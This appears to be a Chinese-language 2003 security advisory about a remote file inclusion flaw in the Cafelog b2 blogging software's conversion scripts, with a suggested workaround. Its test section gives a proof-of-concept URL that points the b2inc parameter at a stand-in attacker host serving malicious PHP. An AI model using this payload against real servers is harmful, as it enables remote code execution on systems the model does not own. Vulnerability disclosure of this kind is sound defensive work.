发布日期：2003-05-29
更新日期：2003-06-04

受影响系统：

Cafelog b2 0.6.1
Cafelog b2 0.6 pre2
Cafelog b2 0.6 pre1

描述：

---

BUGTRAQ  ID: 7738

Cafelog b2是一款WEB日志记录程序，管理员可以通过访问WEB访问日志。

Cafelog b2包含的'blogger-2-b2.php'和'gm-2-b2.php'脚本对用户提交的参数缺少充分过滤，远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。

blogger-2-b2.php包含如下代码：

-----------------------------------------------------
case "step1":

    include("b2config.php");
    include("$b2inc/b2functions.php");
    include("$b2inc/b2vars.php");
------------------------------------------------------------------------------------

而gm-2-b2.php包含如下代码：

----------------------------------------------------------
// 3. load in the browser from there

include("b2config.php");
include($b2inc."/b2functions.php");
-----------------------------------------------------------------------------------


由于都对$b2inc变量没有预定义，因此可以通过全局注入来进行变量定义，攻击者可以指定远程系统中的PHP文件作为参数提交给$b2inc变量，可导致以WEB进程权限执行PHP文件中包含的恶意代码。

<*来源：pokleyzz （pokleyzz@scan-associates.net）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=105427222124050&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://blabla.com/b2-tools/gm-2-b2.php?b2inc=http://attacker.com

其中attacker.com必须包含名为b2functions.php的恶意脚本。

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 暂时删除这些脚本。

厂商补丁：

Cafelog
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.cafelog.com/

浏览次数：3068
严重程度：0（网友投票）